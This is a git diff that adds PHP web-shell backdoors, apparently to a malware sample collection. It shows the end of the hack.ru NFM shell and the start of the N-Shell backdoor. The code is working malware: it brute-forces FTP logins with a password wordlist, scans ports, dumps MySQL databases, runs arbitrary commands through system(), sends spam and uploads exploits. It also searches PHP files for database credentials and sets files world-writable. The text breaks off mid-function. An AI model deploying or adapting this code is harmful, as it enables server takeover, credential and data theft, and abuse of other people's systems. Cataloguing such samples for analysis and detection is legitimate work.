    "; + + + + + +function s() { + + $word="qwrtypsdfghjklzxcvbnm"; + + return $word[mt_rand(0,strlen($word)-1)]; + +} + + + +function g() { + + $word="euioam"; + + return $word[mt_rand(0,strlen($word)-2)]; + +} + + + +function name0() { return s().g().s(); } + +function name1() { return s().g().s().g(); } + +function name2() { return s().g().g().s(); } + +function name3() { return s().s().g().s().g(); } + +function name4() { return g().s().g().s().g(); } + +function name5() { return g().g().s().g().s(); } + +function name6() { return g().s().s().g().s(); } + +function name7() { return s().g().g().s().g(); } + +function name8() { return s().g().s().g().g(); } + +function name9() { return s().g().s().g().s().g(); } + +function name10() { return s().g().s().s().g().s().s(); } + +function name11() { return s().g().s().s().g().s().s().g(); } + + + +$cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,111111,666,1978,1979,1980,1981,1982,1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005); + +$cool2=array('q1w2e3','qwerty','qwerty111111','123456','1234567890','0987654321','asdfg','zxcvbnm','qazwsx','q1e3r4w2','q1r4e3w2','1q2w3e','1q3e2w','poiuytrewq','lkjhgfdsa','mnbvcxz','asdf','root','admin','admin123','lamer123','admin123456','administrator','administrator123','q1w2e3r4t5','root123','microsoft','muther','hacker','hackers','cracker'); + + + +function randword() { + + global $cool; + + $func="name".mt_rand(0,11); + + $func2="name".mt_rand(0,11); + + switch (mt_rand(0,11)) { + + case 0: return $func().mt_rand(5,99); + + case 1: return $func()."-".$func2(); + + case 2: return $func().$cool[mt_rand(0,count($cool)-1)]; + + case 3: return $func()."!".$func(); + + case 4: return randpass(mt_rand(5,12)); + + default: return $func(); + + } + + + + + +} + + + +function randpass($len) { + + $word="qwertyuiopasdfghjklzxcvbnm1234567890"; + + $s=""; + + for ($i=0; $i<$len; $i++) { + + $s.=$word[mt_rand(0,strlen($word)-1)]; + + } + + return $s; + +} + +if (@unlink("pass.txt") < 0){ + +echo "nothing"; + +exit; + +} + +$file="pass.txt"; + +if($file && $host && $login){ + + $cn=mt_rand(30,30); + +for ($i=0; $i<$cn; $i++) { + + $s=$cool2[$i]; + + $f=@fopen(pass.".txt","a+"); + + fputs($f,"$s\n"); + + } + + + + $cnt2=mt_rand(43,43); + +for ($i=0; $i<$cnt2; $i++) { + + $r=$cool[$i]; + + $f=@fopen(pass.".txt","a+"); + + fputs($f,"$login$r\n"); + +} + +$p="$proverka"; + + $f=@fopen(pass.".txt","a+"); + + fputs($f,"$p\n"); + + + + $cnt3=mt_rand($chislo,$chislo); + + for ($i=0; $i<$cnt3; $i++) { + + $u=randword(); + + $f=@fopen(pass.".txt","a+"); + + fputs($f,"$u\n"); + + } + + + + if(is_file($file)){ + + $passwd=file($file,1000); + + for($i=0; $i + +Congratulations! Password is known now.
    + +  Connected to: $host
      with login: $login
      with password: $password + +";exit; + + } + + elseif(preg_match("/530/",$text)){ + + $stop=true; + + + + } + + } + + fclose($open_ftp); + + }else{ + + echo " + + + + + +
    FTP is incorrect!!! At $host 21 port is closed! check your settings
    + +";exit; + + } + + } + + } + +} + + + +} + + + +# port scanner + +function portscan() { + + global $action,$portscan,$port,$HTTP_HOST,$min,$max; + + + + $mtime = explode(" ",microtime()); + + $mtime = $mtime[1] + $mtime[0]; + + $time1 = $mtime; + + + + $id = $HTTP_HOST; + + echo "
    Scan results:  $id
    Scanning host to find any reachable and open ports" . "...
    "; + + + + $lport = $min; + + $hport = $max; + + $op = 0; + + $gp = 0; + + + + for ($porta=$lport; $porta<=$hport; $porta++) { + + $fp = @fsockopen("$id", $porta, &$errno, &$errstr, 4); + + if ( !$fp ) { $gp++; } + + else { + + $port_addres = $port[$porta]; + + if($port_addres == "") $port_addres = "unknown"; + + $serv = getservbyport($porta, TCP); + + echo ""; + + $op++; + + } + + } + + + + if($op == 0) echo "
    Port:$porta / $serv$port_addres(What's the service is?)
    Current host seems don't have any open port...hmm, but you're connected to it to 80...check out firewall
    "; + + + + $unsi = ($op/$porta)*100; + + $unsi = round($unsi); + + + + echo "Scan statistics:"; + + echo "Scanned ports:  $porta"; + + echo "Open ports:  $op"; + + echo "Closed ports:  $gp"; + + + + $mtime = explode(" ",microtime()); + + $mtime = $mtime[1] + $mtime[0]; + + $time2 = $mtime; + + $loadtime = ($time2 - $time1); + + $loadtime = round($loadtime, 2); + + + + echo "Scan time:  $loadtime seconds"; + +} + + + +function nfm_copyright() { + +global $action,$upass,$uname,$nfm; + + return "
    Powered by channel #hack.ru (author xoce). Made In Russia
    "; + + + +} + +// =-=-=-=-= SQL MODULE =-=-=-=-= + +// SQL functions start + +function aff_date() { + + $date_now=date("F j,Y,g:i a"); + + return $date_now; + +} + + + +function sqldumptable($table) { + + global $sv_s,$sv_d,$drp_tbl; + + $tabledump = ""; + + if ($sv_s) { + + if ($drp_tbl) { $tabledump.="DROP TABLE IF EXISTS $table;\n"; } + + $tabledump.="CREATE TABLE $table (\n"; + + $firstfield=1; + + $champs=mysql_query("SHOW FIELDS FROM $table"); + + while ($champ=mysql_fetch_array($champs)) { + + if (!$firstfield) { $tabledump.=",\n"; } + + else { $firstfield=0;} + + $tabledump.=" $champ[Field] $champ[Type]"; + + if ($champ['Null'] !="YES") { $tabledump.=" NOT NULL";} + + if (!empty($champ['Default'])) { $tabledump.=" default '$champ[Default]'";} + + if ($champ['Extra'] !="") { $tabledump.=" $champ[Extra]";} + + } + + + + @mysql_free_result($champs); + + $keys=mysql_query("SHOW KEYS FROM $table"); + + while ($key=mysql_fetch_array($keys)) { + + $kname=$key['Key_name']; + + if ($kname !="PRIMARY" and $key['Non_unique']==0) { $kname="UNIQUE|$kname";} + + if(!is_array($index[$kname])) { $index[$kname]=array();} + + $index[$kname][]=$key['Column_name']; + + } + + + + @mysql_free_result($keys); + + while(list($kname,$columns)=@each($index)) { + + $tabledump.=",\n"; + + $colnames=implode($columns,","); + + if($kname=="PRIMARY") { $tabledump.=" PRIMARY KEY ($colnames)";} + + else { + + if (substr($kname,0,6)=="UNIQUE") { $kname=substr($kname,7);} + + $tabledump.=" KEY $kname ($colnames)"; + + } + + } + + $tabledump.="\n);\n\n"; + + } + + + + if ($sv_d) { + + $rows=mysql_query("SELECT * FROM $table"); + + $numfields=mysql_num_fields($rows); + + while ($row=mysql_fetch_array($rows)) { + + $tabledump.="INSERT INTO $table VALUES("; + + $cptchamp=-1; + + $firstfield=1; + + while (++$cptchamp<$numfields) { + + if (!$firstfield) { $tabledump.=",";} + + else { $firstfield=0;} + + if (!isset($row[$cptchamp])) {$tabledump.="NULL";} + + else { $tabledump.="'".mysql_escape_string($row[$cptchamp])."'";} + + } + + $tabledump.=");\n"; + + } + + @mysql_free_result($rows); + + } + + + + return $tabledump; + +} + + + +function csvdumptable($table) { + + global $sv_s,$sv_d; + + $csvdump="## Table:$table \n\n"; + + if ($sv_s) { + + $firstfield=1; + + $champs=mysql_query("SHOW FIELDS FROM $table"); + + while ($champ=mysql_fetch_array($champs)) { + + if (!$firstfield) { $csvdump.=",";} + + else { $firstfield=0;} + + $csvdump.="'".$champ['Field']."'"; + + } + + + + @mysql_free_result($champs); + + $csvdump.="\n"; + + } + + + + if ($sv_d) { + + $rows=mysql_query("SELECT * FROM $table"); + + $numfields=mysql_num_fields($rows); + + while ($row=mysql_fetch_array($rows)) { + + $cptchamp=-1; + + $firstfield=1; + + while (++$cptchamp<$numfields) { + + if (!$firstfield) { $csvdump.=",";} + + else { $firstfield=0;} + + if (!isset($row[$cptchamp])) { $csvdump.="NULL";} + + else { $csvdump.="'".addslashes($row[$cptchamp])."'";} + + } + + $csvdump.="\n"; + + } + + } + + + + @mysql_free_result($rows); + + return $csvdump; + +} + + + +function write_file($data) { + + global $g_fp,$file_type; + + if ($file_type==1) { gzwrite($g_fp,$data); } + + else { fwrite ($g_fp,$data); } + +} + + + +function open_file($file_name) { + + global $g_fp,$file_type,$dbbase,$f_nm; + + if ($file_type==1) { $g_fp=gzopen($file_name,"wb9"); } + + else { $g_fp=fopen ($file_name,"w"); } + + + + $f_nm[]=$file_name; + + $data=""; + + $data.="##\n"; + + $data.="## NFM hack.ru creator \n"; + + $data.="##-------------------------\n"; + + $data.="## Date:".aff_date()."\n"; + + $data.="## Base:$dbbase \n"; + + $data.="##-------------------------\n\n"; + + write_file($data); + + unset($data); + +} + + + +function file_pos() { + + global $g_fp,$file_type; + + if ($file_type=="1") { return gztell ($g_fp); } + + else { return ftell ($g_fp); } + +} + + + +function close_file() { + + global $g_fp,$file_type; + + if ($file_type=="1") { gzclose ($g_fp); } + + else { fclose ($g_fp); } + +} + + + +function split_sql_file($sql) { + + $morc=explode(";",$sql); + + $sql=""; + + $output=array(); + + $matches=array(); + + $morc_cpt=count($morc); + + for ($i=0;$i < $morc_cpt;$i++) { + + if (($i !=($morc_cpt-1)) || (strlen($morc[$i] > 0))) { + + $total_quotes=preg_match_all("/'/",$morc[$i],$matches); + + $escaped_quotes=preg_match_all("/(?

    "; + + $footer="
    -go back-

    ".nfm_copyright(); + + + + // SQL actions STARTS + + + + if ($sqlaction=='save') { + + if ($secu==1) { + + $fp=fopen($secu_config,"w"); + + fputs($fp,""); + + fclose($fp); + + } + + if (!is_array($tbls)) { + + echo $header." + +
    You forgot to check tables, which you need to dump =)
    \n$footer"; + + exit; + + } + + if($f_cut==1) { + + if (!is_numeric($fz_max)) { + + echo $header."
    Veuillez choisir une valeur num?rique ? la taille du fichier ? scinder.
    \n$footer"; + + exit; + + } + + if ($fz_max < 200000) { + + echo $header."
    Veuillez choisir une taille de fichier a scinder sup + + rieure ? 200 000 Octets.
    \n$footer"; + + exit; + + } + + } + + + + $tbl=array(); + + $tbl[]=reset($tbls); + + if (count($tbls) > 1) { + + $a=true; + + while ($a !=false) { + + $a=next($tbls); + + if ($a !=false) { $tbl[]=$a; } + + } + + } + + + + if ($opt==1) { $sv_s=true; $sv_d=true; } + + else if ($opt==2) { $sv_s=true;$sv_d=false;$fc ="_struct"; } + + else if ($opt==3) { $sv_s=false;$sv_d=true;$fc ="_data"; } + + else { exit; } + + + + $fext=".".$savmode; + + $fich=$dbbase.$fc.$fext; + + $dte=""; + + if ($ecraz !=1) { $dte=date("dMy_Hi")."_"; } $gz=""; + + if ($file_type=='1') { $gz.=".gz"; } + + $fcut=false; + + $ftbl=false; + + $f_nm=array(); + + if($f_cut==1) { $fcut=true;$fz_max=$fz_max;$nbf=1;$f_size=170;} + + if($f_tbl==1) { $ftbl=true; } + + else { + + if(!$fcut) { open_file("dump_".$dte.$dbbase.$fc.$fext.$gz); } + + else { open_file("dump_".$dte.$dbbase.$fc."_1".$fext.$gz); } + + } + + + + $nbf=1; + + mysql_connect($dbhost,$dbuser,$dbpass); + + mysql_select_db($dbbase); + + if ($fext==".sql") { + + if ($ftbl) { + + while (list($i)=each($tbl)) { + + $temp=sqldumptable($tbl[$i]); + + $sz_t=strlen($temp); + + if ($fcut) { + + open_file("dump_".$dte.$tbl[$i].$fc.".sql".$gz); + + $nbf=0; + + $p_sql=split_sql_file($temp); + + while(list($j,$val)=each($p_sql)) { + + if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val.";"); } + + else { close_file(); $nbf++; open_file("dump_".$dte.$tbl[$i].$fc."_".$nbf.".sql".$gz); write_file($val.";"); } + + } + + close_file(); + + } + + else { open_file("dump_".$dte.$tbl[$i].$fc.".sql".$gz);write_file($temp."\n\n");close_file();$nbf=1; } + + $tblsv=$tblsv."".$tbl[$i].",
    "; + + } + + } else { + + $tblsv=""; + + while (list($i)=each($tbl)) { + + $temp=sqldumptable($tbl[$i]); + + $sz_t=strlen($temp); + + if ($fcut && ((file_pos()+$sz_t) > $fz_max)) { + + $p_sql=split_sql_file($temp); + + while(list($j,$val)=each($p_sql)) { + + if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val.";"); } + + else { + + close_file(); + + $nbf++; + + open_file("dump_".$dte.$dbbase.$fc."_".$nbf.".sql".$gz); + + write_file($val.";"); + + } + + } + + } else { write_file($temp); } + + $tblsv=$tblsv."".$tbl[$i].",
    "; + + } + + } + + } + + else if ($fext==".csv") { + + if ($ftbl) { + + while (list($i)=each($tbl)) { + + $temp=csvdumptable($tbl[$i]); + + $sz_t=strlen($temp); + + if ($fcut) { + + open_file("dump_".$dte.$tbl[$i].$fc.".csv".$gz); + + $nbf=0; + + $p_csv=split_csv_file($temp); + + while(list($j,$val)=each($p_csv)) { + + if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val."\n"); } + + else { + + close_file(); + + $nbf++; + + open_file("dump_".$dte.$tbl[$i].$fc."_".$nbf.".csv".$gz); + + write_file($val."\n"); + + } + + } + + close_file(); + + } else { + + open_file("dump_".$dte.$tbl[$i].$fc.".csv".$gz); + + write_file($temp."\n\n"); + + close_file(); + + $nbf=1; + + } + + $tblsv=$tblsv."".$tbl[$i].",
    "; + + } + + } else { + + while (list($i)=each($tbl)) { + + $temp=csvdumptable($tbl[$i]); + + $sz_t=strlen($temp); + + if ($fcut && ((file_pos()+$sz_t) > $fz_max)) { + + $p_csv=split_sql_file($temp); + + while(list($j,$val)=each($p_csv)) { + + if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val."\n"); } + + else { + + close_file(); + + $nbf++; + + open_file("dump_".$dte.$dbbase.$fc."_".$nbf.".csv".$gz); + + write_file($val."\n"); + + } + + } + + } else { write_file($temp); } + + $tblsv=$tblsv."".$tbl[$i].",
    "; + + } + + } + + } + + + + mysql_close(); + + if (!$ftbl) { close_file(); } + + + + echo $header; + + echo "
    All the data in these tables:
    ".$tblsv." were putted to this file:

    "; + + reset($f_nm); + + while (list($i,$val)=each($f_nm)) { + + $coul='#99CCCC'; + + if ($i % 2) { $coul='#CFE3E3'; } + + echo ""; + + $fz_tmp=filesize($val); + + if ($fcut && ($fz_tmp > $fz_max)) { + + echo ""; + + } else { + + echo ""; + + } + + echo ""; + + } + + echo "
    FileSize
     ".$val."  ".$fz_tmp." Octets 
     ".$fz_tmp." bites 

    "; + + echo $footer;exit; + + } + + + + if ($sqlaction=='connect') { + + if(!@mysql_connect($dbhost,$dbuser,$dbpass)) { + + echo $header."
    Unable to connect! Check your data input!
    \n$footer"; + + exit; + + } + + + + if(!@mysql_select_db($dbbase)) { + + echo $header."
    <Unable to connect! Check your data input!
    \n$footer"; + + exit; + + } + + + + if ($secu==1) { + + if (!file_exists($secu_config)) { + + $fp=fopen($secu_config,"w"); + + fputs($fp,""); + + fclose($fp); + + } + + include($secu_config); + + } else { + + if (file_exists($secu_config)) { unlink($secu_config); } + + } + + + + mysql_connect($dbhost,$dbuser,$dbpass); + + $tables=mysql_list_tables($dbbase); + + $nb_tbl=mysql_num_rows($tables); + + + + echo $header."

    Choose tables you need to dump!
    "; + + + + $i=0; + + while ($i < mysql_num_rows ($tables)) { + + $coul='#99CCCC'; + + if ($i % 2) { $coul='#CFE3E3';} + + $tb_nom=mysql_tablename ($tables,$i); + + echo ""; + + $i++; + + } + + + + mysql_close(); + + echo "
    Table names
       ".$tb_nom."



    + + Save to csv (*.csv)
    + + Save to Sql (*.sql)

    + + Save structure and data
    + + Save structure only
    + + Save data only

    + + Rewrite file if exists
    + + Clear database after dump
    + + Put each table to a separate file
    + + Maximum dump-file size: + + Octets
    + + Gzip.
    + +


    $footer"; + + exit; + + } + + + +// SQL actions END + + + + if(file_exists($secu_config)) { + + include ($secu_config); + + $ck="checked"; + + } else { + + $dbhost="localhost"; + + $dbbase=""; + + $dbuser="root"; + + $dbpass=""; + + $ck=""; + + } + + + + echo $header." + +


    + + + + + + + + + + + + + + + + + + + + + + + + + +
    + +
    + +
    + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    Enter data to connect to MySQL server!

    Server address:
    Base name:
    Login:
    Password
    + +


    + +


    + +
    + +
    "; + + + +} + +// SQL END + + + +/* main() */ + +set_time_limit(0); + + + +if ( $action !="download") print("$HTML"); + + + +if (!isset($cm)) { + + if (!isset($action)) { + + if (!isset($tm)) { $tm = getcwd(); } + + $curdir = getcwd(); + + if (!@chdir($tm)) exit("
    Access to directory is denied, see CHMOD.
    "); + + getdir(); + + chdir($curdir); + + $supsub = $gdir[$j-1]; + + if (!isset($tm) ) { $tm=getcwd();} + + readdirdata($tm); + + } else { + + switch ($action) { + + case "view": + + viewfile($tm,$fi); + + break; + + case "delete": + + echo "
    File $fi was deleted successfully.
    "; + + deletef($tm); + + break; + + case "download": + + if (isset($fatt) && strlen($fatt)>0) { + + $attach=$fatt; + + header("Content-type: text/plain"); + + } + + else { + + $attach=$fi; + + header("Content-type: hackru"); + + } + + header("Content-disposition: attachment; filename=\"$attach\";"); + + readfile($tm."/".$fi); + + break; + + case "download_mail": + + download_mail($tm,$fi); + + break; + + case "edit": + + editfile($tm,$fi); + + break; + + case "save": + + savefile($tm,$fi); + + break; + + case "uploadd": + + uploadtem(); + + break; + + case "up": + + up($tm); + + break; + + case "newdir": + + newdir($tm); + + break; + + case "createdir": + + cdir($tm); + + break; + + case "deldir": + + deldir(); + + break; + + case "feedback": + + mailsystem(); + + break; + + case "upload": + + upload(); + + break; + + case "help": + + help(); + + break; + + case "ftp": + + ftp(); + + break; + + case "portscan": + + portscan(); + + break; + + case "sql": + + sql(); + + break; + + case "tar": + + tar(); + + break; + + case "bash": + + bash(); + + break; + + case "passwd": + + passwd(); + + break; + + case "exploits": + + exploits($dir); + + break; + + case "upload_exploits": + + upload_exploits($dir); + + break; + + case "upload_exploitsp": + + upload_exploitsp($dir); + + break; + + case "arhiv": + + arhiv($tm,$pass); + + break; + + case "crypte": + + crypte(); + + break; + + case "decrypte": + + decrypte(); + + break; + + case "brut_ftp": + + brut_ftp(); + + break; + + case "copyfile": + + copyfile($tm,$fi); + + break; + + case "down": + + down($dir); + + break; + + case "downfiles": + + downfiles($dir); + + break; + + case "spam": + + spam(); + + break; + + } + + } + +} else { + + echo "
    Done: $cm
    ";
    +
    + echo system($cm);
    +
    + echo "
    "; + +} + + + +if ($action !="download" && $action != "down" && $action != "spam" && $action != "brut_ftp" && $action != "download_mail" && $action != "copyfile" && $action != "crypte" && $action != "decrypte" && $action != "exploits" && $action != "arhiv" && $action != "download_mail2" && $action != "feedback" && $action != "uploadd" && $action != "newdir" && $action != "edit" && $action != "view" && $action != "help" && $action != "ftp" && $action != "portscan" && $action != "sql" && $action != "tar" && $action != "bash" && $action != "anonimmail") { + + echo "
    Command prompy (like bash):
    "; + + $perdir = @permissions(fileperms($tm)); + + if ($perdir && $perdir[7] == "w" && isset($tm)) uploadtem(); + + else echo "
    Unable to upload files to current directory
    "; + + if ($perdir[7] == "w" && isset($tm)) { + + echo "
    Create directory:
    "; + + } else { + + echo "
    Unable to create directory here
    "; + + } + +} + + + +if ($action !="download" && $action != "down" && $action != "spam" && $action != "brut_ftp" && $action != "download_mail" && $action != "copyfile" && $action != "crypte" && $action != "decrypte" && $action != "exploits" && $action != "arhiv" && $action != "download_mail2" && $action != "feedback" && $action != "uploadd" && $action != "newdir" && $action != "edit" && $action != "view" && $action != "help" && $action != "aliases" && $action != "portscan" && $action != "ftp" && $action != "sql" && $action != "tar" && $action != "bash" && $action != "anonimmail") { + + echo "
    Ready usefull requests to unix server:
    "; + +} + + + +if ( $action !="download") echo nfm_copyright(); + +?> + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/PHP/Backdoor.PHP.NShell.a b/PHP/Backdoor.PHP.NShell.a new file mode 100644 index 00000000..1a35635f --- /dev/null +++ b/PHP/Backdoor.PHP.NShell.a @@ -0,0 +1,1464 @@ + + + + + + $v){ + $_POST[$k] = stripslashes($v); + } + } + $exit = explode(".txt?",$_SERVER['REQUEST_URI']); + if ($exit[0] != $_SERVER['REQUEST_URI']) { + if (isset($_GET)) { + $url_z = $_SERVER['REQUEST_URI']; + $rl = explode(".txt?",$url_z); + $url = $rl[0] . ".txt?&"; + + $pmaurl = explode("/",strrev($_SERVER['REQUEST_URI'])); + $pmaurll = strrev($pmaurl[0]); + $file = explode("&x_pwned=pma",$pmaurll); + $pmaurl_final = $file[0] . "&x_pwned=pma"; + } + } else { + $url_z = $_SERVER['REQUEST_URI']; + $rl = explode(".php",$url_z); + $url = $rl[0] . ".php?"; + + $pmaurl = explode("/",strrev($_SERVER['REQUEST_URI'])); + $pmaurll = strrev($pmaurl[0]); + $file = explode("&x_pwned=pma",$pmaurll); + $pmaurl_final = $file[0] . "&x_pwned=pma"; + } + if ($_GET['x_pwned'] == 'pma') { + $surl_z = $_SERVER['REQUEST_URI']; + $srl = explode(".txt?",$url_z); + $surl = $srl[0] . ".txt?&x_pwned=pma&"; + } + echo ""; + echo "==//N-SHEL\\\== by n0tiz and FiLEFUSiON"; + echo " + + "; + $uname = php_uname(); + $curuser = exec('whoami'); + echo ""; + echo "
    '; + } + echo '
    "; + echo "Serverinfo
    "; + + echo "Safe Mode: "; + if($safe_mode == 1){ + echo "ON"; + } else { + echo "OFF"; + } + echo ""; + echo "
    PHP Version: ".phpversion().""; + echo "
    "; + echo ""; + echo "Shell Directory: ".getcwd()."
    "; + echo("Uname: " . $uname . "
    "); + echo("Current User: " . $curuser . "
    "); + echo("ID:" . @exec('id') . "
    "); + echo "Date: "; + $vandaag = getdate(); + $maand = $vandaag['month']; + $mdag = $vandaag['mday']; + $jaar = $vandaag['year']; + echo $mdag . " , " . $maand . " , " . $jaar; + echo "
    "; + echo "Your IP: "; + if (getenv(HTTP_X_FORWARDED_FOR)) { + echo getenv(HTTP_X_FORWARDED_FOR); + } else { + echo getenv(REMOTE_ADDR); + } + echo "
    "; + echo "Server IP: "; + echo getenv("SERVER_ADDR"); + echo "
    "; + echo "Server OS: "; + echo php_uname("s"); + echo ""; + echo "
     _______              _________.__           .__  .__   
    + \      \            /   _____/|  |__   ____ |  | |  |  
    + /   |   \   ______  \_____  \ |  |  \_/ __ \|  | |  |  
    +/    |    \ /_____/  /        \|   Y  \  ___/|  |_|  |__
    +\____|__  /         /_______  /|___|  /\___  >____/____/
    +        \/                  \/      \/     \/           
    "; + echo "
    "; + if ($_GET['x_pwned'] == 'sql') { // sql-commando-lijn + echo "
    "; + if(!(@mysql_connect($_SESSION['host'],$_SESSION['user'],$_SESSION['pass']) && @mysql_select_db($_SESSION['data']))) { // sql connectie met sessies + if (isset($_POST['connect'])) { + if (empty ($_POST['host']) OR empty ($_POST['user']) OR empty ($_POST['pass']) OR empty ($_POST['data'])) { + echo "Kon geen connectie maken."; + } else { + $_SESSION['host'] = $_POST['host']; + $_SESSION['user'] = $_POST['user']; + $_SESSION['pass'] = $_POST['pass']; + $_SESSION['data'] = $_POST['data']; + echo "Database-connectie gelukt."; + echo ""; + } + } + echo ' +
    + Host:
    + User:
    + Pass:
    + Data:
    + +
    + '; + } else if (mysql_connect($_SESSION['host'],$_SESSION['user'],$_SESSION['pass']) && @mysql_select_db($_SESSION['data'])) { + if (isset($_POST['submit'])) { + if (mysql_query("{$_POST['command']}")) { + echo "


    ".$_POST['command']."
    is succesvol uitgevoerd.


    "; + } else { + echo "Commando kon niet uitgevoerd worden."; + } + echo "


    "; + } + echo "
    Command:


    "; + } + } else if ($_GET['x_pwned'] == 'ftp') { // file editor, map browser, ... + /*if (isset($_GET['map'])) { + $map = $_GET['map']; + } else { + $map = "."; + }*/ + echo "
    "; + /*if ($handle = opendir($map)) { + while (false !== ($file = readdir($handle))) { + $index = explode("?",$_SERVER['REQUEST_URI']); + $files = explode(".",$file); + if ($files[1] == "") { + if (isset($_GET['map'])) { + $mp = $_GET['map'] . "/" . $file; + } else { + $mp = $file; + } + echo "" . $file . "
    "; + } else { + echo "" . $file . "
    "; + } + } + closedir($handle); + }*/ + function dec_str($line, $len) { + if (strlen($line) > $len) { + $afgekort = substr($line, 0, $len) . "..."; + } else { + $afgekort = $line; + } + return $afgekort; + } + function getalcheck($iGetal) { + $iNum = ($iGetal / 2); + $aNum = explode('.', $iNum); + if($aNum[1] == 5) { + $iEven = 0; + } else { + $iEven = 1; + } + return $iEven; + } + echo ''; + } else { + echo '
    '; + if(!$_GET['map']){ + echo '
    root
    ' . $_GET['map'] . 'Terug
    '; + if($_GET['map']){ + echo ''; + $map = $_GET['map'] . "*"; + $files = glob($map); + if(!$files){ + echo ""; + } else { + foreach ($files as $f) { + $f = ereg_replace($_GET['map'], "", $f); + echo ''; + $extensie = explode(".", $f); + if(strlen($extensie[1]) > 0){ + // Geen bestanden laten zien he! + } else { + chmod($_GET['map'] . $f . "/", 0777); + if (is_writable($_GET['map'] . $f . "/")) { + $font = ""; + $font_eind = ""; + } + echo ''; + echo ''; + $bg++; + } + echo ''; + } + $map = $_GET['map'] . "*"; + $files = glob($map); + foreach($files as $f){ + echo ''; + $f2 = ereg_replace($_GET['map'], "", $f); + $extensie = explode(".", $f); + chmod($_GET['map'] . $f2, 0777); + if(strlen($extensie[1]) > 2){ + echo ''; + echo ''; + }else{ + // Geen bestanden laten zien he! + } + echo ''; + } + } + echo "
    Geen bestanden in deze map!
    map' . $font . dec_str($f, 35) . $font_eind . '[v]
    file' . dec_str($f2, 35) . '[d] - [b] - [v]
    "; + } else { + echo ''; + $files = glob("*"); + foreach($files as $f){ + echo ''; + $extensie = explode(".", $f); + if(strlen($extensie[1]) > 0){ + // Geen bestanden laten zien he! + } else { + chmod($f . "/", 0777); + if (is_writable($f . "/")) { + $font = ""; + $font_eind = ""; + } + echo ''; + echo ''; + $bg++; + } + echo ''; + } + $files = glob("*.*"); + foreach($files as $f){ + echo ''; + $extensie = explode(".", $f); + if(strlen($extensie[1]) > 2){ + chmod($f, 0777); + echo ''; + echo ''; + } else { + // Geen bestanden laten zien he! + } + echo ''; + } + echo "
    map' . $font . dec_str($f, 35) . $font_eind . '[v]
    file' . dec_str($f, 35) . '[d] - [b] - [v]
    "; + } + echo "
    "; + if (isset($_GET['ver'])) { // files verwijderen + $file_delete = $_GET['ver']; + if (@unlink($file_delete) OR @rmdir($file_delete)) { + echo "" . dec_str($file_delete, 35) . " is succesvol verwijderd."; + } else { + echo "" . dec_str($file_delete, 35) . " kon niet verwijderd worden."; + } + } else if (isset($_GET['bew'])) { // nu: files bekijken; later: files bekijken/bewerken + function File_Scan($dir) { + $handle=opendir($dir); + while(($file=readdir($handle))!==FALSE) { + $point = $dir . $file; + if($file == $_GET['bew']){ + $myFile = $point; + $fh = fopen($myFile, 'r'); + $theData = fread($fh, filesize($myFile)); + fclose($fh); + $ext = explode(".",$_GET['bew']); + if ($ext[1] == 'jpg' OR $ext[1] == 'png' OR $ext[1] == 'jpeg' OR $ext[1] == 'gif' OR $ext[1] == 'bmp') { + echo $_GET['bew'] . "
    "; + echo ""; + } else { + echo "
    "; + echo $_GET['bew'] . "
    "; + echo ''; + echo "
    "; + } + } + } + } + if ($_GET['map']) { + $dir = "./" . $_GET['map']; + } else { + $dir = "./"; + } + File_Scan($dir); + } else { // files uploaden + if ($_POST['loadup']) { + if ($_GET['map']) { + $uploaddir = $_GET['map']; + } else { + $uploaddir = ''; + } + $uploadfile = $uploaddir . $_FILES['upfile']['name']; + if (move_uploaded_file($_FILES['upfile']['tmp_name'], $uploadfile)) { + echo "File upload is gelukt."; + } else { + echo "File upload mislukt."; + } + } + echo '
    '; + echo 'File:'; + echo '


    '; + // createdir + if ($_POST['dir']) { + if ($_GET['map']) { + $dirbefore = $_GET['map']; + } else { + $dirbefore = "./"; + } + $totaldir = $dirbefore . $_POST['dirname']; + if (mkdir($totaldir, 0777)) { + echo "De map is succesvol aangemaakt."; + } else { + echo "Het aanmaken van de map is mislukt."; + } + } + echo '
    '; + echo 'Dirname:'; + echo '
    '; + } + echo "
    "; + echo "
    "; + } else if($_GET['x_pwned'] == 'scf') { // config finder + echo "
    "; + // script zoekt naar files die string mysql_select_db bevatten zodat je in de SQL commandline kunt inloggen met de db gegevens + + function scf($map) { + $handle = opendir($map); + while (false!==($file = readdir($handle))) { + if ($file != "." AND $file != "..") { + $file_map=$map."/".$file; + $extensie = explode(".", $file); + if ($extensie[1] == "php") { + $file2 = file_get_contents($file_map); + if(ereg("mysql_select_db",$file2) OR ereg("mysql_connect",$file2)) { + echo $file_map . "
    "; + $myFile = $file_map; + $fh = fopen($myFile, 'r'); + $theData = fread($fh, filesize($myFile)); + fclose($fh); + echo '

    '; + } + } + if(is_dir($file_map)) + scf($file_map); + } + } + } + $map = "."; + scf($map); + echo "
    "; + } else if ($_GET['x_pwned'] == 'pma') { // phpmyadmin + // de functies die nodig zijn voor de phpmyadmin + function view_size($size) { + if (!is_numeric($size)) { + return FALSE; + } else { + if ($size >= 1073741824) { + $size = round($size/1073741824*100)/100 ." GB"; + } elseif ($size >= 1048576) { + $size = round($size/1048576*100)/100 ." MB"; + } elseif ($size >= 1024) { + $size = round($size/1024*100)/100 ." KB"; + } else { + $size = $size . " B"; + } + return $size; + } + } + function mysql_dump($set) { + global $shver; + $sock = $set["sock"]; + $db = $set["db"]; + $echo = $set["echo"]; + $nl2br = $set["nl2br"]; + $file = $set["file"]; + $add_drop = $set["add_drop"]; + $tabs = $set["tabs"]; + $onlytabs = $set["onlytabs"]; + $ret = array(); + $ret["err"] = array(); + if (!is_resource($sock)) { + echo("Error: \$sock is not valid resource."); + } + if (empty($db)) { + $db = "db"; + } + if (empty($echo)) { + $echo = 0; + } + if (empty($nl2br)) { + $nl2br = 0; + } + if (empty($add_drop)) { + $add_drop = TRUE; + } + if (empty($file)) { + $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db.".sql"; + } + if (!is_array($tabs)) { + $tabs = array(); + } + if 